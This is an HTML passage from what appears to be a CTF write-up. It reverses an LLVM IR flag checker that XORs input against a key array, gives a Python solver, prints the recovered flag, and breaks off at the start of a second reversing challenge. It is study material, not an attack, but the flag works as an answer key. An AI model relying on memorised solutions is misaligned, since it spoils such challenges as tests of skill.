url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACbklEQVQ4y43SSW/TQBgG4IlTmi6khHi3EzuJ7exOGmdxW9KS0HRNqVQom4B7qVAlLnDihMRyQQIKqCqbhMSvAHHmV70dO1YFbSkcHn0zn0avP3tMDKsIM1uEkkiB5SVwgkKr7OME2d/zovpXgpRAnJ55PLOKD70bILKqQ0uZ0HQTetpCQjf8qqUsJGlfTab9YN4LDnD0wSwr/GE8FsfoeRZETRqwcjadsoyMVfKljQIkRYcoa3SCpD8lJ6iHRDUFOZ2D8ptEpgBFM0H0dAmFch2SmqGHNfCSDk6kVUgGaCjdi7Qfi8uoVVtY2nmC7vvvWN7/iSXP3g/0v/7C9MNXXmAeppUPvpt0+P2O4kUFZ8/F0ai7qC7fQrhzB8Ozm2Baawi762BmNhCpdEBSmSLKFce/lDgnBa93nHcB0RiHyWoDxe4GmPZ1DNMQUp0fqC3iTH4KRNNzsOiE3gSDmz09sDbZQH7hGkj3NkYo0uiD1FdAWpcxVJr1JsyhWLYhKsngt5FP5D0wGmPhOC7K7UUMZZuYqF7EaK6JkWwdkVwL4xkbJGM2USg0wfM0kE2A4wb1KK8/MSGgUpmGXXIQHYuCoxOzFBfj/crGBZB8cwumcwW8rkI2s5AM8zjTGqBr2cpSFkS/HzAMvwqpNIh1swd37z7ct9tw351g9x5aAX/9ZsDd3T7st15vYXp/B/aDqyBcyQLfc8B3JsF3az6RErz9JQdsuwL2gn26GWqWnqvlQcbuboJ8eQHm0zOEPj/3MYEQ7TH/4+NThL69ROTRFg2s2WDW5xFe7SC8Qq11B+s+rUtzCC+0/63XBrM8h8iUgwObVanAdOruoAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b22abdcaae0658056c62601c0f3aa594/8ac56/image-20240615155952218.webp 240w,\n/static/b22abdcaae0658056c62601c0f3aa594/d3be9/image-20240615155952218.webp 480w,\n/static/b22abdcaae0658056c62601c0f3aa594/e46b2/image-20240615155952218.webp 960w,\n/static/b22abdcaae0658056c62601c0f3aa594/9d46a/image-20240615155952218.webp 1401w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b22abdcaae0658056c62601c0f3aa594/8ff5a/image-20240615155952218.png 240w,\n/static/b22abdcaae0658056c62601c0f3aa594/e85cb/image-20240615155952218.png 480w,\n/static/b22abdcaae0658056c62601c0f3aa594/d9199/image-20240615155952218.png 960w,\n/static/b22abdcaae0658056c62601c0f3aa594/fe238/image-20240615155952218.png 1401w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b22abdcaae0658056c62601c0f3aa594/d9199/image-20240615155952218.png\"\n            alt=\"image-20240615155952218\"\n            title=\"image-20240615155952218\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>If the assembly code doesn’t behave as expected, it’s helpful to change the verbose value to <code class=\"language-text\">QL_VERBOSE.DEBUG</code> and test locally.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">ql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n    code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n    rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n    archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n    ostype<span class=\"token operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n    verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEBUG<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Enabling debug mode allows you to easily view detailed information such as system call invocations and their results, as shown below, which is very helpful.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78f2f657426df1b560115864ec16bc73/faa22/image-20240616114006163.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVQY052R3W6DMAyFw39IgHQhhA7aSaUdu9ombXv/VzuzXcG0214cObaT48+KOr+c8breMJ9mxBjRdR2stVBKPSY2+/75wvV2xcfnO9a3FdP0DB50oiE8aJonhNDDNhbGGNR1LUNZf/k9qjAEeewObi8aUwtp0zZi0pDKskSSJLvSNBVt5zzPkWUZ1HiMRLegJwKtNQyZVroSg6oqJRZFce8RzUbFuaZ7DCFG28pMuCwXMWzbFuNxxEA17z0ORO39k0S+N8SBVg/S5w245pwTwt3Q954+YxCyf40H9QsUJ4c+V/pHhgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78f2f657426df1b560115864ec16bc73/8ac56/image-20240616114006163.webp 240w,\n/static/78f2f657426df1b560115864ec16bc73/d3be9/image-20240616114006163.webp 480w,\n/static/78f2f657426df1b560115864ec16bc73/e46b2/image-20240616114006163.webp 960w,\n/static/78f2f657426df1b560115864ec16bc73/f992d/image-20240616114006163.webp 1440w,\n/static/78f2f657426df1b560115864ec16bc73/2dde2/image-20240616114006163.webp 1509w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78f2f657426df1b560115864ec16bc73/8ff5a/image-20240616114006163.png 240w,\n/static/78f2f657426df1b560115864ec16bc73/e85cb/image-20240616114006163.png 480w,\n/static/78f2f657426df1b560115864ec16bc73/d9199/image-20240616114006163.png 960w,\n/static/78f2f657426df1b560115864ec16bc73/07a9c/image-20240616114006163.png 1440w,\n/static/78f2f657426df1b560115864ec16bc73/faa22/image-20240616114006163.png 1509w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78f2f657426df1b560115864ec16bc73/d9199/image-20240616114006163.png\"\n            alt=\"image-20240616114006163\"\n            title=\"image-20240616114006163\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"cha-ll-engerev\" style=\"position:relative;\"><a href=\"#cha-ll-engerev\" aria-label=\"cha ll engerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>cha-ll-enge(Rev)</h2>\n<blockquote>\n<p>It’s a file format I’ve never seen before, but looking at its contents might reveal something…?</p>\n</blockquote>\n<p>The challenge binary is a source that looks like Java intermediate language (LLVM IR).</p>\n<p>At a glance, it’s clear that the code simply XORs each character of the flag with the corresponding value defined in <code class=\"language-text\">@__const.main.key</code>, then XORs the result with the next key value and checks whether the outcome is 0.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">@__const.main.key <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>i32 <span class=\"token number\">119</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">96</span>, i32 <span class=\"token number\">6</span>, i32 <span class=\"token number\">50</span>, i32 <span class=\"token number\">80</span>, i32 <span class=\"token number\">43</span>, i32 <span class=\"token number\">28</span>, i32 <span class=\"token number\">117</span>, i32 <span class=\"token number\">22</span>, i32 <span class=\"token number\">125</span>, i32 <span class=\"token number\">34</span>, i32 <span class=\"token number\">21</span>, i32 <span class=\"token number\">116</span>, i32 <span class=\"token number\">23</span>, i32 <span class=\"token number\">124</span>, i32 <span class=\"token number\">35</span>, i32 <span class=\"token number\">18</span>, i32 <span class=\"token number\">35</span>, i32 <span class=\"token number\">85</span>, i32 <span class=\"token number\">56</span>, i32 <span class=\"token number\">103</span>, i32 <span class=\"token number\">14</span>, i32 <span class=\"token number\">96</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">39</span>, i32 <span class=\"token number\">85</span>, i32 <span class=\"token number\">56</span>, i32 <span class=\"token number\">93</span>, i32 <span class=\"token number\">57</span>, i32 <span class=\"token number\">8</span>, i32 <span class=\"token number\">60</span>, i32 <span class=\"token number\">72</span>, i32 <span class=\"token number\">45</span>, i32 <span class=\"token number\">114</span>, i32 <span class=\"token number\">0</span>, i32 <span class=\"token number\">101</span>, i32 <span class=\"token number\">21</span>, i32 <span class=\"token number\">103</span>, i32 <span class=\"token number\">84</span>, i32 <span class=\"token number\">39</span>, i32 <span class=\"token number\">66</span>, i32 <span class=\"token number\">44</span>, i32 <span class=\"token number\">27</span>, i32 <span class=\"token number\">122</span>, i32 <span class=\"token number\">77</span>, i32 <span class=\"token number\">36</span>, i32 <span class=\"token number\">20</span>, i32 <span class=\"token number\">122</span>, i32 <span class=\"token number\">7</span><span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n@.str <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Input FLAG : <span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.1 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"%s<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.2 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Correct! FLAG is %s.<span class=\"token entity\" title=\"\\0\">\\0</span>A<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n@.str.3 <span class=\"token operator\">=</span> private unnamed_addr constant <span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span> c<span class=\"token string\">\"Incorrect FLAG.<span class=\"token entity\" title=\"\\00\">\\00</span>\"</span>, align <span class=\"token number\">1</span>\n\n<span class=\"token punctuation\">;</span> Function Attrs: noinline nounwind optnone uwtable\ndefine dso_local i32 @main<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token comment\">#0 {</span>\n  %1 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %2 <span class=\"token operator\">=</span> alloca <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n  %3 <span class=\"token operator\">=</span> alloca <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, align <span class=\"token number\">16</span>\n  %4 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %5 <span class=\"token operator\">=</span> alloca i32, align <span class=\"token number\">4</span>\n  %6 <span class=\"token operator\">=</span> alloca i64, align <span class=\"token number\">8</span>\n  store i32 <span class=\"token number\">0</span>, i32* %1, align <span class=\"token number\">4</span>\n  %7 <span class=\"token operator\">=</span> bitcast <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3 to i8*\n  call void @llvm.memcpy.p0i8.p0i8.i64<span class=\"token punctuation\">(</span>i8* align <span class=\"token number\">16</span> %7, i8* align <span class=\"token number\">16</span> bitcast <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* @__const.main.key to i8*<span class=\"token punctuation\">)</span>, i64 <span class=\"token number\">200</span>, i1 <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span>\n  %8 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @printf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">14</span> x i8<span class=\"token punctuation\">]</span>* @.str, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">))</span>\n  %9 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %10 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @__isoc99_scanf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">3</span> x i8<span class=\"token punctuation\">]</span>* @.str.1, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>, i8* noundef %9<span class=\"token punctuation\">)</span>\n  %11 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %12 <span class=\"token operator\">=</span> call i64 @strlen<span class=\"token punctuation\">(</span>i8* noundef %11<span class=\"token punctuation\">)</span> <span class=\"token comment\">#4</span>\n  %13 <span class=\"token operator\">=</span> icmp eq i64 %12, <span class=\"token number\">49</span>\n  br i1 %13, label %14, label %48\n\n<span class=\"token number\">14</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %0\n  store i32 <span class=\"token number\">0</span>, i32* %4, align <span class=\"token number\">4</span>\n  store i32 <span class=\"token number\">0</span>, i32* %5, align <span class=\"token number\">4</span>\n  store i64 <span class=\"token number\">0</span>, i64* %6, align <span class=\"token number\">8</span>\n  br label %15\n\n<span class=\"token number\">15</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %38, %14\n  %16 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %17 <span class=\"token operator\">=</span> icmp ult i64 %16, <span class=\"token number\">49</span>\n  br i1 %17, label %18, label %41\n\n<span class=\"token number\">18</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %15\n  %19 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %20 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 %19\n  %21 <span class=\"token operator\">=</span> load i8, i8* %20, align <span class=\"token number\">1</span>\n  %22 <span class=\"token operator\">=</span> sext i8 %21 to i32\n  %23 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %24 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3, i64 <span class=\"token number\">0</span>, i64 %23\n  %25 <span class=\"token operator\">=</span> load i32, i32* %24, align <span class=\"token number\">4</span>\n  %26 <span class=\"token operator\">=</span> xor i32 %22, %25\n  %27 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %28 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> i64 %27, <span class=\"token number\">1</span>\n  %29 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">50</span> x i32<span class=\"token punctuation\">]</span>* %3, i64 <span class=\"token number\">0</span>, i64 %28\n  %30 <span class=\"token operator\">=</span> load i32, i32* %29, align <span class=\"token number\">4</span>\n  %31 <span class=\"token operator\">=</span> xor i32 %26, %30\n  store i32 %31, i32* %5, align <span class=\"token number\">4</span>\n  %32 <span class=\"token operator\">=</span> load i32, i32* %5, align <span class=\"token number\">4</span>\n  %33 <span class=\"token operator\">=</span> icmp eq i32 %32, <span class=\"token number\">0</span>\n  br i1 %33, label %34, label %37\n\n<span class=\"token number\">34</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %18\n  %35 <span class=\"token operator\">=</span> load i32, i32* %4, align <span class=\"token number\">4</span>\n  %36 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> nsw i32 %35, <span class=\"token number\">1</span>\n  store i32 %36, i32* %4, align <span class=\"token number\">4</span>\n  br label %37\n\n<span class=\"token number\">37</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %34, %18\n  br label %38\n\n<span class=\"token number\">38</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %37\n  %39 <span class=\"token operator\">=</span> load i64, i64* %6, align <span class=\"token number\">8</span>\n  %40 <span class=\"token operator\">=</span> <span class=\"token function\">add</span> i64 %39, <span class=\"token number\">1</span>\n  store i64 %40, i64* %6, align <span class=\"token number\">8</span>\n  br label %15, <span class=\"token operator\">!</span>llvm.loop <span class=\"token operator\">!</span><span class=\"token number\">6</span>\n\n<span class=\"token number\">41</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %15\n  %42 <span class=\"token operator\">=</span> load i32, i32* %4, align <span class=\"token number\">4</span>\n  %43 <span class=\"token operator\">=</span> icmp eq i32 %42, <span class=\"token number\">49</span>\n  br i1 %43, label %44, label %47\n\n<span class=\"token number\">44</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %41\n  %45 <span class=\"token operator\">=</span> getelementptr inbounds <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">70</span> x i8<span class=\"token punctuation\">]</span>* %2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span>\n  %46 <span class=\"token operator\">=</span> call i32 <span class=\"token punctuation\">(</span>i8*, <span class=\"token punctuation\">..</span>.<span class=\"token punctuation\">)</span> @printf<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">22</span> x i8<span class=\"token punctuation\">]</span>* @.str.2, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>, i8* noundef %45<span class=\"token punctuation\">)</span>\n  store i32 <span class=\"token number\">0</span>, i32* %1, align <span class=\"token number\">4</span>\n  br label %50\n\n<span class=\"token number\">47</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %41\n  br label %48\n\n<span class=\"token number\">48</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %47, %0\n  %49 <span class=\"token operator\">=</span> call i32 @puts<span class=\"token punctuation\">(</span>i8* noundef getelementptr inbounds <span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span>, <span class=\"token punctuation\">[</span><span class=\"token number\">16</span> x i8<span class=\"token punctuation\">]</span>* @.str.3, i64 <span class=\"token number\">0</span>, i64 <span class=\"token number\">0</span><span class=\"token punctuation\">))</span>\n  store i32 <span class=\"token number\">1</span>, i32* %1, align <span class=\"token number\">4</span>\n  br label %50\n\n<span class=\"token number\">50</span>:                                               <span class=\"token punctuation\">;</span> preds <span class=\"token operator\">=</span> %48, %44\n  %51 <span class=\"token operator\">=</span> load i32, i32* %1, align <span class=\"token number\">4</span>\n  ret i32 %51\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Therefore, by using the following solver to repeatedly XOR each key with the next key value, the flag could be easily identified.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">key <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">119</span><span class=\"token punctuation\">,</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">96</span><span class=\"token punctuation\">,</span><span class=\"token number\">6</span><span class=\"token punctuation\">,</span><span class=\"token number\">50</span><span class=\"token punctuation\">,</span><span class=\"token number\">80</span><span class=\"token punctuation\">,</span><span class=\"token number\">43</span><span class=\"token punctuation\">,</span><span class=\"token number\">28</span><span class=\"token punctuation\">,</span><span class=\"token number\">117</span><span class=\"token punctuation\">,</span><span class=\"token number\">22</span><span class=\"token punctuation\">,</span><span class=\"token number\">125</span><span class=\"token punctuation\">,</span><span class=\"token number\">34</span><span class=\"token punctuation\">,</span><span class=\"token number\">21</span><span class=\"token punctuation\">,</span><span class=\"token number\">116</span><span class=\"token punctuation\">,</span><span class=\"token number\">23</span><span class=\"token punctuation\">,</span><span class=\"token number\">124</span><span class=\"token punctuation\">,</span><span class=\"token number\">35</span><span class=\"token punctuation\">,</span><span class=\"token number\">18</span><span class=\"token punctuation\">,</span><span class=\"token number\">35</span><span class=\"token punctuation\">,</span><span class=\"token number\">85</span><span class=\"token punctuation\">,</span><span class=\"token number\">56</span><span class=\"token punctuation\">,</span><span class=\"token number\">103</span><span class=\"token punctuation\">,</span><span class=\"token number\">14</span><span class=\"token punctuation\">,</span><span class=\"token number\">96</span><span class=\"token punctuation\">,</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">39</span><span class=\"token punctuation\">,</span><span class=\"token number\">85</span><span class=\"token punctuation\">,</span><span class=\"token number\">56</span><span class=\"token punctuation\">,</span><span class=\"token number\">93</span><span class=\"token punctuation\">,</span><span class=\"token number\">57</span><span class=\"token punctuation\">,</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span><span class=\"token number\">60</span><span class=\"token punctuation\">,</span><span class=\"token number\">72</span><span class=\"token punctuation\">,</span><span class=\"token number\">45</span><span class=\"token punctuation\">,</span><span class=\"token number\">114</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">101</span><span class=\"token punctuation\">,</span><span class=\"token number\">21</span><span class=\"token punctuation\">,</span><span class=\"token number\">103</span><span class=\"token punctuation\">,</span><span class=\"token number\">84</span><span class=\"token punctuation\">,</span><span class=\"token number\">39</span><span class=\"token punctuation\">,</span><span class=\"token number\">66</span><span class=\"token punctuation\">,</span><span class=\"token number\">44</span><span class=\"token punctuation\">,</span><span class=\"token number\">27</span><span class=\"token punctuation\">,</span><span class=\"token number\">122</span><span class=\"token punctuation\">,</span><span class=\"token number\">77</span><span class=\"token punctuation\">,</span><span class=\"token number\">36</span><span class=\"token punctuation\">,</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span><span class=\"token number\">122</span><span class=\"token punctuation\">,</span><span class=\"token number\">7</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">[</span>i<span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token operator\">^</span>key<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n    \n<span class=\"token comment\"># ctf4b{7ick_7ack_11vm_int3rmed14te_repr3sen7a7i0n}</span></code></pre></div>\n<h2 id=\"constructrev\" style=\"position:relative;\"><a href=\"#constructrev\" aria-label=\"constructrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>construct(Rev)</h2>\n<blockquote>\n<p>There seem to be a lot of unused functions…?</p>\n</blockquote>\n<p>Analyzing the challenge binary, the main function doesn’t perform any particularly notable operations, but a chain of functions is registered in <code class=\"language-text\">.init_array</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 449px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 102.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAACyUlEQVQ4y42V627iMBCFeQISICQUCkkc23GutECllbpdCqiUSm1X/dG9vf97nB07gQISpT8siMCfz5w54zQEl1AyRqyXEFBKocgLxDE9qwRlWZjfI8GRXudQRQKZxUgnOeJMwe124XoeXNc1q/H6+w0v76/YvDxhtVphvV5juVhgsX7Ew/ML5o+PmD9tsNisMF/f437xA4vlEvP7Oe7u7nB7e3uwGsmsgBwrDNkIjuvBsm20HQddz4XdaiFhHLMkw4TWlNZYKtiWhWazCatpwbIOVyOdlVCTFEHM0Om00e50wYsU8iqjUnp4+L7En81P/Hp+x7+3v3jbvKJFB+nNNh1+vBrJNEd2UyDKBNrtlgEy8oalEl7vAu6IwRmF6PEEw3wCj8lq82lggWSaIZDhTqEGinFqFF4SYBjFGIoErJiB5ddm42mFswo4inwCdg6AWuGAgJdcYaQK8OtvGMqEYJ8BSWFKZYeq9tCpgSUp7PXQD7mBjuIcQXpFn9kZhRo4yxDGh0BZlzwIBfpBZIBhMcFIpruOnmyKAW4VdhwDjHJVAXXJ5KGfjo2H2ssK9omHBwq1hwSLKTbeRd8ATckyg5+UVHZp8nlSYWqA2sNoB4xIIacR25ZcQWPTlCAbf8XDHCwhYPsDaIJtulwBw2KKqLzZK9n+god7QL7nofGRQLrLPsXnDLAwk8ISXgGdWuE4M7HRJV/WwdadrmJjnS/ZeLin0ORw2+U62CFNiW6MbbfOT4ovgo8cpvEuNjrYegU6NuXMwM80Ja9mOa5n2XFJraBnUY1eHewqMuRhUhzE5hi885BvbxujUMKX0W6WfVXuJsUbDAnSPADtfz+YZYeucO2P43bR6Tp0gPa0A8e7MJev2x+Yu1Bv3N6J1nHJLIwgIo6IRWBBCMYYBL1bAt+H4PSOoXeLRwdEitOtPkQg6D8ph8ikaeJxyf8BFgk46V